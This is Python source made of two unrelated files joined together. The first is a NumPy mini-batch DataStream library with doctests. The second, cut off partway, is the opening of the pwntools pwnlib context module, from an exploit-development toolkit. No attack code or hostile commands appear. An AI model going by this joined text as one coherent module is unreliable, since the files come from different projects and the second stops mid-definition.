>>> def mapper(x, y):
... return x + y
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> stream = DataStream.arrays([x, y], batch_size=3).map(mapper)
>>> for [a] in stream:
... print(a)
[5 7 9]
[11 13]
or you may return a tuple / list of arrays:
>>> def mapper(x, y):
... return x + y, x * y # or return [x + y, x * y]
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> stream = DataStream.arrays([x, y], batch_size=3).map(mapper)
>>> for [a, b] in stream:
... print(a, b)
[5 7 9] [ 0 6 14]
[11 13] [24 36]
To pre-fetch from a time-consuming data stream in background thread
(which is necessary when using a slow mapper), you may:
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> with stream.threaded(prefetch=2) as prefetch_stream:
... for [x] in prefetch_stream:
... print(x)
[0 1 2]
[3 4]
"""
def __init__(self,
batch_size: Optional[int] = None,
array_count: Optional[int] = None,
data_shapes: Optional[Tuple[ArrayShape, ...]] = None,
data_length: Optional[int] = None,
random_state: Optional[np.random.RandomState] = None):
"""
Construct a :class:`DataStream`.
Args:
batch_size: The number of data within each mini-batch.
array_count: The number of arrays within each mini-batch.
data_shapes: The data shapes (excluding the batch axis).
data_length: The total number of data.
random_state: The NumPy random state instance.
Raises:
ValueError: If `len(data_shapes) != array_count`.
>>> stream = DataStream(data_shapes=((), (3, 5)), array_count=3)
Traceback (most recent call last):
...
ValueError: len(data_shapes) != array_count: data_shapes ((), (3, 5)) vs array_count 3
"""
if batch_size is not None:
batch_size = int(batch_size)
if array_count is not None:
array_count = int(array_count)
if data_shapes is not None:
data_shapes = to_data_shapes(data_shapes)
if array_count is None:
array_count = len(data_shapes)
elif array_count != len(data_shapes):
raise ValueError(f'len(data_shapes) != array_count: '
f'data_shapes {data_shapes} vs '
f'array_count {array_count}')
if data_length is not None:
data_length = int(data_length)
if random_state is not None and not \
isinstance(random_state, np.random.RandomState):
raise TypeError(f'`random_state` is not np.random.RandomState: '
f'{random_state!r}')
if data_length is not None and batch_size is not None:
batch_count = int((data_length + batch_size - 1) // batch_size)
else:
batch_count = None
self._batch_size = batch_size
self._batch_count = batch_count
self._array_count = array_count
self._data_shapes = data_shapes
self._data_length = data_length
self._random_state = random_state
self._active_iterator = None
self._auto_close_iterator_warning_printed = False
def __iter__(self) -> GeneratorIterator[ArrayTuple]:
"""
Iterate through the mini-batches.
Note if a previous iterator is not closed before obtaining a new one,
the previous iterator will be closed automatically, and a warning will
be printed to the console (for only once).
"""
if self._active_iterator is not None:
self._active_iterator.close()
self._active_iterator = None
if not self._auto_close_iterator_warning_printed:
warnings.warn(
f'Another iterator of the DataStream {self!r} is still '
f'active, will close it automatically. If you did not '
f'exhaust the iterator, remember to call `close()` on it.',
UserWarning,
)
self._auto_close_iterator_warning_printed = True
def make_generator():
g = self._minibatch_iterator()
try:
yield from g
finally:
self._active_iterator = None
self._active_iterator = GeneratorIterator(make_generator())
return self._active_iterator
def __len__(self):
"""
Get the total number of data.
If a data stream reports this number (i.e., being not None), then it
equals to the sum of array lengths from all mini-batches in one epoch.
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> len(stream)
5
>>> stream = DataStream.int_seq(5, batch_size=3, skip_incomplete=True)
>>> len(stream)
3
Raises:
RuntimeError: If a data stream cannot report this number,
i.e., `data_length` is None.
>>> def g():
... yield np.arange(3)
>>> stream = DataStream.generator(g)
>>> stream.data_length is None
True
>>> len(stream)
Traceback (most recent call last):
...
RuntimeError: stream data length is not available
"""
ret = self.data_length
if ret is None:
raise RuntimeError(f'stream data length is not available')
return ret
@property
def batch_size(self) -> Optional[int]:
"""
Get the batch size of this data stream.
If a data stream reports this number (i.e., being not None), then the
actual length of each mini-batch is guaranteed to be NO MORE THAN this.
>>> x = np.random.normal(size=[5, 4])
>>> stream = DataStream.arrays([x], batch_size=3)
>>> stream.batch_size
3
"""
return self._batch_size
@property
def array_count(self) -> Optional[int]:
"""
Get the count of arrays within each mini-batch.
>>> x = np.random.normal(size=[5, 4])
>>> y = np.random.normal(size=[5, 3, 2])
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> stream.array_count
2
"""
return self._array_count
@property
def data_shapes(self) -> Optional[Tuple[ArrayShape, ...]]:
"""
Get the data shapes.
Data shapes are shapes if mini-batch array without the batch axis.
>>> x = np.random.normal(size=[5, 4])
>>> y = np.random.normal(size=[5, 3, 2])
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> stream.data_shapes
((4,), (3, 2))
"""
return self._data_shapes
@property
def data_length(self) -> Optional[int]:
"""
Get the total number of data.
If a data stream reports this number (i.e., being not None), then it
equals to the sum of array lengths from all mini-batches in one epoch.
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> stream.data_length
5
>>> stream = DataStream.int_seq(5, batch_size=3, skip_incomplete=True)
>>> stream.data_length
3
"""
return self._data_length
@property
def batch_count(self) -> Optional[int]:
"""
Get the total number of batches in an epoch.
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> stream.batch_count
2
>>> stream = DataStream.int_seq(5, batch_size=3, skip_incomplete=True)
>>> stream.batch_count
1
"""
return self._batch_count
@property
def random_state(self) -> Optional[np.random.RandomState]:
"""Get the NumPy random state associated with this data stream."""
return self._random_state
def copy(self, **kwargs):
"""
Get a copy of this data stream.
You may override some of the construction arguments by specifying
named arguments via :param:`kwargs`. However, some argument may
not be overridable (depends on the implementation of subclasses).
>>> x = np.arange(5, dtype=np.int32)
>>> stream = DataStream.arrays([x], batch_size=3)
>>> for [a] in stream:
... print(a)
[0 1 2]
[3 4]
>>> stream2 = stream.copy(batch_size=4)
>>> isinstance(stream2, ArraysDataStream)
True
>>> for [a] in stream2:
... print(a)
[0 1 2 3]
[4]
Args:
\\**kwargs: The overrided construction arguments.
Returns:
The copied data stream.
"""
raise NotImplementedError()
def _copy_helper(self, attrs: Iterable[str], **kwargs):
for attr in attrs:
kwargs.setdefault(attr, getattr(self, attr))
return self.__class__(**kwargs)
def _minibatch_iterator(self) -> Generator[ArrayTuple, None, None]:
raise NotImplementedError()
def get_arrays(self, max_batch: Optional[int] = None) -> Tuple[np.ndarray, ...]:
"""
Collecting mini-batches into NumPy arrays.
>>> x = np.arange(0, 5, dtype=np.int32)
>>> stream = DataStream.arrays([x], batch_size=3).map(lambda t: t ** 2)
>>> arrays = stream.get_arrays()
>>> len(arrays)
1
>>> print(arrays[0])
[ 0 1 4 9 16]
>>> arrays = stream.get_arrays(max_batch=1)
>>> len(arrays)
1
>>> print(arrays[0])
[0 1 4]
>>> arrays = stream.get_arrays(max_batch=0)
>>> len(arrays)
1
>>> print(arrays[0])
[]
Args:
max_batch: If specified, will take at most this number of batches.
Returns:
The collected arrays.
Raises:
RuntimeError: If this data-flow is empty.
>>> def g():
... if False:
... yield ()
>>> stream = DataStream.generator(g)
>>> stream.get_arrays()
Traceback (most recent call last):
...
RuntimeError: empty data stream cannot be converted to arrays
"""
arrays_buf = []
g = iter(self)
try:
try:
batch = next(g)
except StopIteration:
raise RuntimeError(
'empty data stream cannot be converted to arrays')
try:
arrays_buf = [[to_number_or_numpy(arr)] for arr in batch]
batch_index = 1
while max_batch is None or batch_index < max_batch:
batch = next(g)
for i, arr in enumerate(batch):
arrays_buf[i].append(to_number_or_numpy(arr))
batch_index += 1
if max_batch == 0:
arrays_buf = [[array_buf[0][:0]]
for array_buf in arrays_buf]
except StopIteration:
pass
return tuple(np.concatenate(array_buf) for array_buf in arrays_buf)
finally:
g.close()
def to_arrays_stream(self,
batch_size: int = NOT_SET,
shuffle: bool = False,
skip_incomplete: bool = False,
random_state: Optional[np.random.RandomState] = NOT_SET
) -> 'ArraysDataStream':
"""
Convert this data-flow to an arrays stream.
By default, the original batch size will be preserved:
>>> stream = DataStream.int_seq(5, batch_size=3).map(lambda x: x ** 2)
>>> isinstance(stream, MapperDataStream)
True
>>> stream2 = stream.to_arrays_stream()
>>> isinstance(stream2, ArraysDataStream)
True
>>> for [a] in stream2:
... print(a)
[0 1 4]
[ 9 16]
You may also override the batch size:
>>> stream3 = stream.to_arrays_stream(batch_size=4)
>>> for [a] in stream3:
... print(a)
[0 1 4 9]
[16]
Args:
batch_size: The number of data within each mini-batch.
If not specified, will use the original batch size if possible.
shuffle: Whether or not to shuffle data?
skip_incomplete: Whether or not to exclude the last mini-batch
if it is incomplete?
random_state : The NumPy random state instance.
If not specified, will use the original random state instance.
Returns:
The constructed array stream.
Raises:
ValueError: If the batch size is neither specified, nor can it
be determined according to the original batch size.
>>> def g():
... yield np.arange(3)
>>> stream = DataStream.generator(g)
>>> stream.to_arrays_stream()
Traceback (most recent call last):
...
ValueError: `batch_size` must be specified
"""
if batch_size is NOT_SET:
batch_size = self.batch_size
if batch_size is None:
raise ValueError('`batch_size` must be specified')
if random_state is NOT_SET:
random_state = self.random_state
return ArraysDataStream(
self.get_arrays(), batch_size=batch_size, shuffle=shuffle,
skip_incomplete=skip_incomplete, random_state=random_state
)
# -------- here starts the factory methods --------
@staticmethod
def arrays(arrays: Iterable[Array],
batch_size: int,
shuffle: bool = False,
skip_incomplete: bool = False,
random_state: Optional[np.random.RandomState] = None
) -> 'ArraysDataStream':
"""
Construct an arrays stream, i.e., :class:`ArraysDataStream`.
>>> x = np.arange(5, dtype=np.int32)
>>> y = x ** 2
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> for [a, b] in stream:
... print(a, b)
[0 1 2] [0 1 4]
[3 4] [ 9 16]
You may shuffle the data by setting `shuffle = True`:
>>> np.random.seed(1234)
>>> stream = DataStream.arrays([x, y], batch_size=3, shuffle=True)
>>> for [a, b] in stream:
... print(a, b)
[4 0 1] [16 0 1]
[2 3] [4 9]
You may discard the last incomplete mini-batch by setting
`skip_incomplete = True`:
>>> stream = DataStream.arrays(
... [x, y], batch_size=3, skip_incomplete=True)
>>> for [a, b] in stream:
... print(a, b)
[0 1 2] [0 1 4]
Args:
arrays: A sequence of numpy-like arrays.
These arrays should be at least 1-d, and the size of the
first axis must be identical.
batch_size: The number of data within each mini-batch.
shuffle: Whether or not to shuffle data?
skip_incomplete: Whether or not to exclude the last mini-batch
if it is incomplete?
random_state: The numpy random state instance.
Returns:
The arrays stream.
"""
return ArraysDataStream(
arrays=arrays,
batch_size=batch_size,
shuffle=shuffle,
skip_incomplete=skip_incomplete,
random_state=random_state
)
@staticmethod
def int_seq(start: int,
stop: int = None,
step: int = None,
*,
dtype=np.int32,
batch_size: int = NOT_SET,
shuffle: bool = False,
skip_incomplete: bool = False,
random_state: Optional[np.random.RandomState] = None
) -> 'IntSeqDataStream':
"""
Construct a integer sequence stream, i.e., :class:`IntSeqStream`.
To construct various integer sequences:
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> for [a] in stream:
... print(a)
[0 1 2]
[3 4]
>>> stream = DataStream.int_seq(2, 11, 2, batch_size=3)
>>> for [a] in stream:
... print(a)
[2 4 6]
[ 8 10]
>>> stream = DataStream.int_seq(-5, step=-1, batch_size=3)
>>> for [a] in stream:
... print(a)
[ 0 -1 -2]
[-3 -4]
>>> stream = DataStream.int_seq(-2, -11, -2, batch_size=3)
>>> for [a] in stream:
... print(a)
[-2 -4 -6]
[ -8 -10]
You may shuffle the sequence by setting `shuffle = True`:
>>> np.random.seed(1234)
>>> stream = DataStream.int_seq(5, batch_size=3, shuffle=True)
>>> for [a] in stream:
... print(a)
[4 0 1]
[2 3]
You may discard the last incomplete mini-batch by setting
`skip_incomplete = True`:
>>> stream = DataStream.int_seq(5, batch_size=3, skip_incomplete=True)
>>> for [a] in stream:
... print(a)
[0 1 2]
Args:
start: If `stop` is specified, this is the starting number.
Otherwise this is the ending number, and the starting
number is 0.
stop: The ending number.
step: The sequence incremental step.
dtype: The NumPy data type.
batch_size: The number of data within each mini-batch.
shuffle: Whether or not to shuffle data?
skip_incomplete: Whether or not to exclude the last mini-batch
if it is incomplete?
random_state: The numpy random state instance.
Returns:
The integer sequence stream.
"""
return IntSeqDataStream(
start=start, stop=stop, step=step, dtype=dtype,
batch_size=batch_size, shuffle=shuffle,
skip_incomplete=skip_incomplete, random_state=random_state,
)
@staticmethod
def gather(streams: Iterable['DataStream'],
random_state: Optional[np.random.RandomState] = None
) -> 'GatherDataStream':
return GatherDataStream(streams=streams, random_state=random_state)
@staticmethod
def generator(f: Callable[[], ArraysOrArrayGenerator]
) -> 'GeneratorFactoryDataStream':
return GeneratorFactoryDataStream(f)
# -------- here starts the transforming methods --------
def map(self,
mapper: Callable[..., ArraysOrArray],
preserve_shapes: bool = False
) -> 'MapperDataStream':
"""
Transform this data stream via a mapper function.
To return a single array:
>>> def mapper(x, y):
... return x + y
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> stream = DataStream.arrays([x, y], batch_size=3).map(mapper)
>>> for [a] in stream:
... print(a)
[5 7 9]
[11 13]
To return a tuple / list of arrays:
>>> def mapper(x, y):
... return x + y, x * y # or return [x + y, x * y]
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> stream = DataStream.arrays([x, y], batch_size=3).map(mapper)
>>> for [a, b] in stream:
... print(a, b)
[5 7 9] [ 0 6 14]
[11 13] [24 36]
Args:
mapper: The mapper function.
preserve_shapes: User specified hint, whether or not the
`mapper` preserves the array count and shapes within
each mini-batch? This hint might benefit further
transformation. By default :obj:`False`.
>>> def mapper(x, y):
... return x ** 2, y - 1
>>> x = np.random.normal(size=[5, 4])
>>> y = np.random.normal(size=[5, 3, 2])
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> stream.array_count, stream.data_shapes
(2, ((4,), (3, 2)))
>>> stream2 = stream.map(mapper)
>>> stream2.array_count, stream2.data_shapes
(None, None)
>>> stream3 = stream.map(mapper, preserve_shapes=True)
>>> stream3.array_count, stream3.data_shapes
(2, ((4,), (3, 2)))
Returns:
The transformed data stream.
"""
return MapperDataStream(
source=self, mapper=mapper, preserve_shapes=preserve_shapes)
def threaded(self, prefetch: int = 5) -> 'ThreadingDataStream':
"""
Construct a data stream that prefetches this data stream in a
background thread.
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> with stream.threaded() as prefetch_stream:
... for [x] in prefetch_stream:
... print(x)
[0 1 2]
[3 4]
Args:
prefetch: Number of mini-batches to prefetch in background.
Returns:
The background data stream.
"""
return ThreadingDataStream(self, prefetch=prefetch)
def select(self, indices: Iterable[int]) -> 'MapperDataStream':
"""
Construct a data stream that selects a subset of the arrays within
each mini-batch, or re-order the arrays.
Given the following source data stream:
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> z = np.arange(10, 15, dtype=np.int32)
>>> source = DataStream.arrays([x, y, z], batch_size=3)
We shall select [x, z, x] from source:
>>> stream = source.select([0, 2, 0])
>>> for [a, b, c] in stream:
... print(a, b, c)
[0 1 2] [10 11 12] [0 1 2]
[3 4] [13 14] [3 4]
The various data stream properties are also properly inherited:
>>> x = np.random.normal(size=[5, 4])
>>> y = np.random.normal(size=[5, 2, 3])
>>> source = DataStream.arrays([x, y], batch_size=3)
>>> stream = source.select([-1, 0, 1])
>>> stream.array_count
3
>>> stream.data_shapes
((2, 3), (4,), (2, 3))
>>> stream.data_length
5
Args:
indices: The indices of the arrays to select within each mini-batch.
Returns:
The transformed data stream.
Raises:
IndexError: If `self.array_count` is reported, and any index
in `indices` out of this range.
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> stream.select([0, 1, 2])
Traceback (most recent call last):
...
IndexError: array index out of range
Note if `self.array_count` is not reported (i.e., is None),
then :class:`IndexError` will not be raised until iterated.
>>> def mapper(x, y, z):
... return x + y, y - z
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> z = np.arange(10, 15, dtype=np.int32)
>>> stream = DataStream.arrays([x, y, z], batch_size=3). \
map(mapper).select([0, 1, 2])
>>> for batch in stream:
... print(batch)
Traceback (most recent call last):
...
IndexError: tuple index out of range
"""
# validate the argument
indices = tuple(indices)
if self.array_count is not None:
for i in indices:
if i < -self.array_count or i >= self.array_count:
raise IndexError(f'array index out of range')
# prepare for the mapper
def mapper(*arrays):
return tuple(arrays[j] for j in indices)
# construct the mapper data stream
if self.data_shapes is not None:
data_shapes = tuple(self.data_shapes[i] for i in indices)
else:
data_shapes = None
array_count = len(indices)
return MapperDataStream(
source=self, mapper=mapper, data_shapes=data_shapes,
array_count=array_count
)
class ArraysDataStream(DataStream):
"""NumPy arrays data stream."""
def __init__(self,
arrays: Iterable[Array],
batch_size: int,
shuffle: bool,
skip_incomplete: bool,
random_state: Optional[np.random.RandomState] = None):
# validate parameters
arrays = tuple(arrays)
if not arrays:
raise ValueError('`arrays` must not be empty.')
for a in arrays:
if not hasattr(a, 'shape'):
raise ValueError('`arrays` must be arrays.')
if len(a.shape) < 1:
raise ValueError('`arrays` must be at least 1-d arrays.')
data_shapes = to_data_shapes(arr.shape[1:] for arr in arrays)
array_length = len(arrays[0])
for a in arrays[1:]:
if len(a) != array_length:
raise ValueError('`arrays` must have the same length.')
if skip_incomplete:
data_length = array_length // batch_size * batch_size
else:
data_length = array_length
# construct the instance
super().__init__(
batch_size=batch_size,
array_count=len(data_shapes),
data_shapes=data_shapes,
data_length=data_length,
random_state=random_state,
)
self._arrays = map_to_tuple(to_readonly_array, arrays)
self._indices_buffer = None # type: Array
self._shuffle = bool(shuffle)
self._skip_incomplete = bool(skip_incomplete)
@property
def the_arrays(self):
"""Get the underlying NumPy arrays without copy."""
return self._arrays
@property
def shuffle(self) -> bool:
"""Whether or not to shuffle data?"""
return self._shuffle
@property
def skip_incomplete(self) -> bool:
"""Whether or not to exclude the last mini-batch if it is incomplete?"""
return self._skip_incomplete
def _minibatch_iterator(self) -> Generator[ArrayTuple, None, None]:
# shuffle the source arrays if necessary
if self.shuffle:
if self._indices_buffer is None:
indices_count = len(self._arrays[0])
t = np.int32 if indices_count < (1 << 31) else np.int64
self._indices_buffer = np.arange(indices_count, dtype=t)
rng = self._random_state or np.random
rng.shuffle(self._indices_buffer)
def get_slice(s):
return tuple(
a[self._indices_buffer[s]]
for a in self.the_arrays
)
else:
def get_slice(s):
return tuple(a[s] for a in self.the_arrays)
# now iterator through the mini-batches
for batch_s in minibatch_slices_iterator(
length=self.data_length,
batch_size=self.batch_size,
skip_incomplete=self.skip_incomplete):
yield get_slice(batch_s)
def copy(self, **kwargs):
return self._copy_helper(
('batch_size', 'shuffle', 'skip_incomplete', 'random_state'),
arrays=self._arrays,
**kwargs
)
class IntSeqDataStream(DataStream):
"""Integer sequence data stream."""
def __init__(self,
start: int,
stop: int = None,
step: int = None,
*,
dtype=np.int32,
batch_size: int = NOT_SET,
shuffle: bool = False,
skip_incomplete: bool = False,
random_state: Optional[np.random.RandomState] = None):
# validate the arguments
start = int(start)
if stop is None:
stop = start
start = 0
else:
stop = int(stop)
if step is None:
step = 1
else:
step = int(step)
dtype = np.dtype(dtype)
if batch_size is NOT_SET:
raise ValueError('`batch_size` is required.')
# construct the int sequence
seq = np.arange(start=start, stop=stop, step=step, dtype=dtype)
if skip_incomplete:
data_length = len(seq) // batch_size * batch_size
else:
data_length = len(seq)
# construct the instance
super().__init__(
batch_size=batch_size,
array_count=1,
data_shapes=((),),
data_length=data_length,
random_state=random_state,
)
self._start = start
self._stop = stop
self._step = step
self._dtype = dtype
self._seq = seq
self._shuffle = bool(shuffle)
self._skip_incomplete = bool(skip_incomplete)
@property
def start(self) -> int:
"""Get the starting number."""
return self._start
@property
def stop(self) -> int:
"""Get the ending number."""
return self._stop
@property
def step(self) -> int:
"""Get the sequence incremental step."""
return self._step
@property
def dtype(self) -> np.dtype:
"""Get the NumPy data type."""
return self._dtype
@property
def shuffle(self) -> bool:
"""Whether or not to shuffle data?"""
return self._shuffle
@property
def skip_incomplete(self) -> bool:
"""Whether or not to exclude the last mini-batch if it is incomplete?"""
return self._skip_incomplete
def _minibatch_iterator(self):
if self.shuffle:
rng = self._random_state or np.random
rng.shuffle(self._seq)
for batch_s in minibatch_slices_iterator(
length=self.data_length,
batch_size=self.batch_size,
skip_incomplete=self.skip_incomplete):
yield (to_readonly_array(self._seq[batch_s]),)
def copy(self, **kwargs):
return self._copy_helper(
('dtype', 'batch_size', 'shuffle', 'skip_incomplete',
'random_state'),
start=self.start, stop=self.stop, step=self.step,
**kwargs
)
class UserGeneratorDataStream(DataStream):
"""Base class for data streams with user generated data."""
def _validate_batch(self, batch):
batch = ensure_batch_is_tuple(batch)
if self.batch_size is not None and batch:
batch_size = len(batch[0])
if batch_size > self.batch_size:
raise ValueError(
f'batch size of the mapper output is not '
f'valid: expected <= {self.batch_size}, '
f'got {batch_size}'
)
for i, b in enumerate(batch[1:], 1):
if len(b) != batch_size:
raise ValueError(
f'batch size of the {i}-th mapper output != '
f'the first output'
)
if self.array_count is not None and len(batch) != self.array_count:
raise ValueError(f'user generator returned invalid number of '
f'arrays: expected {self.array_count}, got '
f'{len(batch)}')
if self.data_shapes is not None:
for i, (x, y) in enumerate(zip(batch, self.data_shapes)):
if x.shape[1:] != y:
raise ValueError(
f'data shape of the {i}-th mapper output is not '
f'valid: expected {y}, got {x.shape[1:]}'
)
return batch
class GeneratorFactoryDataStream(UserGeneratorDataStream):
"""Data stream that turns a generator factory function into a stream."""
def __init__(self, factory: Callable[[], ArraysOrArrayGenerator]):
super().__init__()
self._factory = factory
@property
def factory(self) -> Callable[[], Generator[Sequence[Array], None, None]]:
"""
Get the generator factory function (i.e., function that returns a
mini-batch arrays generator).
"""
return self._factory
def _minibatch_iterator(self):
g = self._factory()
try:
for batch in g:
yield self._validate_batch(batch)
finally:
if hasattr(g, 'close'): # pragma: no cover
g.close()
def copy(self, **kwargs):
return self._copy_helper((), factory=self.factory, **kwargs)
class GatherDataStream(DataStream):
"""Data stream that gathers multiple streams into one."""
def __init__(self,
streams: Iterable[DataStream],
random_state: Optional[np.random.RandomState] = NOT_SET):
# validate the streams
streams = tuple(streams)
if not streams:
raise ValueError('At least one data stream should be specified.')
for i, stream in enumerate(streams):
if not isinstance(stream, DataStream):
raise TypeError(f'The {i}-th element of `streams` is not an '
f'instance of DataStream: {stream}.')
# inspect the properties of the data streams
batch_size = NOT_SET
array_count = 0
data_shapes = []
data_length = NOT_SET
for i, stream in enumerate(streams):
# check the batch size
if stream.batch_size is not None:
if batch_size is NOT_SET:
batch_size = stream.batch_size
elif batch_size != stream.batch_size:
raise ValueError(
f'Inconsistent batch size among the specified streams: '
f'encountered {stream.batch_size} at the {i}-th '
f'stream, but has already encountered {batch_size} '
f'before.'
)
# check the array count
if array_count is not None:
if stream.array_count is not None:
array_count += stream.array_count
else:
array_count = None
# check the data shapes
if data_shapes is not None:
if stream.data_shapes is not None:
data_shapes.extend(stream.data_shapes)
else:
data_shapes = None
# check the data length
if stream.data_length is not None:
if data_length is NOT_SET:
data_length = stream.data_length
elif data_length != stream.data_length:
raise ValueError(
f'Inconsistent data length among the specified '
f'streams: encountered {stream.data_length} at '
f'the {i}-th stream, but has already encountered '
f'{data_length} before.'
)
# check the random state
if stream.random_state is not None and random_state is NOT_SET:
random_state = stream.random_state
if batch_size is NOT_SET:
batch_size = None
if data_shapes is not None:
data_shapes = tuple(data_shapes)
if data_length is NOT_SET:
data_length = None
if random_state is NOT_SET:
random_state = None
# construct the instance
super().__init__(
batch_size=batch_size,
array_count=array_count,
data_shapes=data_shapes,
data_length=data_length,
random_state=random_state
)
self._streams = streams
@property
def streams(self) -> Tuple[DataStream, ...]:
"""Get the gathered data streams."""
return self._streams
def _minibatch_iterator(self):
iterators = [iter(s) for s in self._streams]
try:
for batches in zip(*iterators):
yield sum([tuple(b) for b in batches], ())
finally:
for i in iterators:
if hasattr(i, 'close'): # pragma: no cover
i.close()
def copy(self, **kwargs):
return self._copy_helper(('random_state',), streams=self.streams, **kwargs)
class MapperDataStream(UserGeneratorDataStream):
"""Data stream that transforms the source stream via a mapper function."""
def __init__(self,
source: DataStream,
mapper: Callable[..., ArraysOrArray],
batch_size: Optional[int] = NOT_SET,
array_count: Optional[int] = NOT_SET,
data_shapes: Optional[Tuple[ArrayShape, ...]] = NOT_SET,
data_length: Optional[int] = NOT_SET,
random_state: Optional[np.random.RandomState] = NOT_SET,
preserve_shapes: bool = False):
# validate the arguments
if not isinstance(source, DataStream):
raise TypeError(f'`source` is not a DataStream: {source!r}')
if batch_size is NOT_SET:
batch_size = source.batch_size
if array_count is NOT_SET:
if preserve_shapes:
array_count = source.array_count
else:
array_count = None
if data_shapes is NOT_SET:
if preserve_shapes:
data_shapes = source.data_shapes
else:
data_shapes = None
if data_length is NOT_SET:
data_length = source.data_length
if random_state is NOT_SET:
random_state = source.random_state
super().__init__(
batch_size=batch_size,
array_count=array_count,
data_shapes=data_shapes,
data_length=data_length,
random_state=random_state
)
self._source = source
self._mapper = mapper
@property
def source(self) -> DataStream:
"""Get the source data stream."""
return self._source
def _minibatch_iterator(self):
g = iter(self._source)
try:
for batch in g:
yield self._validate_batch(
self._mapper(*ensure_batch_is_tuple(batch)))
finally:
g.close()
def copy(self, **kwargs):
return self._copy_helper(
('batch_size', 'array_count', 'data_shapes', 'data_length',
'random_state'),
source=self._source,
mapper=self._mapper,
**kwargs
)
class ThreadingDataStream(DataStream, AutoInitAndCloseable):
"""
Data stream that prefetches mini-batches from the source stream
in a background thread.
"""
EPOCH_END = object()
"""Object to mark an ending position of an epoch."""
class ErrorBox(object):
"""Class to carry an error."""
def __init__(self, error):
self.error = error
def __init__(self,
source: DataStream,
prefetch: int):
# validate the parameters
if not isinstance(source, DataStream):
raise TypeError(f'`source` is not a DataStream: {source!r}')
prefetch = int(prefetch)
if prefetch < 1:
raise ValueError('`prefetch` must be at least 1')
# construct the instance
super().__init__(
batch_size=source.batch_size,
array_count=source.array_count,
data_shapes=source.data_shapes,
data_length=source.data_length,
random_state=source.random_state,
)
self._source = source
self._prefetch = prefetch
# internal states for background worker
self._worker = None # type: Thread
self._batch_queue = None # type: Queue
self._epoch_counter = None # counter for tracking the active epoch
self._stopping = None
self._worker_alive = None
self._worker_ready_sem = None
@property
def source(self) -> DataStream:
"""Get the source data stream."""
return self._source
@property
def prefetch(self) -> int:
"""Get the number of mini-batches to prefetch in background."""
return self._prefetch
def _worker_func(self):
active_epoch = self._epoch_counter
self._worker_alive = True
self._worker_ready_sem.release()
try:
while not self._stopping:
# iterate through the mini-batches in the current epoch
g = iter(self.source)
try:
for batch in g:
if self._stopping or active_epoch < self._epoch_counter:
break
self._batch_queue.put((active_epoch, batch))
finally:
g.close()
# put the epoch ending mark into the queue
if not self._stopping:
self._batch_queue.put((active_epoch, self.EPOCH_END))
# move to the next epoch
active_epoch += 1
except Exception as ex: # pragma: no cover
getLogger(__name__).warning(
f'{self.__class__.__qualname__} exited because of error',
exc_info=True
)
self._batch_queue.put((active_epoch, self.ErrorBox(ex)))
raise
finally:
self._worker_alive = False
def _init(self):
# prepare for the worker states
self._batch_queue = Queue(self.prefetch)
self._epoch_counter = 0
self._stopping = False
self._worker_ready_sem = Semaphore(value=0)
# create and start the worker
self._worker = Thread(target=self._worker_func)
self._worker.daemon = True
self._worker.start()
# wait for the thread to show up
self._worker_ready_sem.acquire()
def _close(self):
try:
# prevent the worker thread from further work
self._stopping = True
# exhaust all remaining queue items to notify the background worker
while not self._batch_queue.empty():
self._batch_queue.get()
# wait until the worker exit
self._worker.join()
finally:
self._worker = None
self._batch_queue = None
self._worker_ready_sem = None
self._initialized = False
def _minibatch_iterator(self):
self.init()
try:
# iterate through one epoch
while self._worker_alive or not self._batch_queue.empty():
epoch, payload = self._batch_queue.get()
if epoch < self._epoch_counter:
# we've got a remaining item from the last epoch, skip it
pass
elif epoch > self._epoch_counter: # pragma: no cover
# we've accidentally got an item from the future epoch
# it should be a bug, and we shall report it
raise RuntimeError('Unexpected entry from future epoch.')
elif payload is self.EPOCH_END:
# we've got the epoch ending mark for the current epoch,
# so we should break the loop
break
elif isinstance(payload, self.ErrorBox):
# we've got an error, re-raise it
self.close()
raise payload.error
else:
# we've got a normal batch for the current epoch,
# so yield it
yield payload
finally:
self._epoch_counter += 1
def copy(self, **kwargs):
return self._copy_helper(('prefetch',), source=self.source, **kwargs)
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
Implements context management so that nested/scoped contexts and threaded
contexts work properly and as expected.
"""
from __future__ import absolute_import
from __future__ import division
import collections
import functools
import logging
import os
import platform
import six
import socket
import stat
import string
import subprocess
import sys
import threading
import time
import socks
from pwnlib.config import register_config
from pwnlib.device import Device
from pwnlib.timeout import Timeout
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
__all__ = ['context', 'ContextType', 'Thread']
_original_socket = socket.socket
class _devnull(object):
name = None
def write(self, *a, **kw): pass
def read(self, *a, **kw): return ''
def flush(self, *a, **kw): pass
def close(self, *a, **kw): pass
class _defaultdict(dict):
"""
Dictionary which loads missing keys from another dictionary.
This is neccesary because the ``default_factory`` method of
:class:`collections.defaultdict` does not provide the key.
Examples:
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['foo']
'bar'
>>> 'foo' in b
False
>>> b['foo'] = 'baz'
>>> b['foo']
'baz'
>>> del b['foo']
>>> b['foo']
'bar'
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['baz'] #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: 'baz'
"""
def __init__(self, default=None):
super(_defaultdict, self).__init__()
if default is None:
default = {}
self.default = default
def __missing__(self, key):
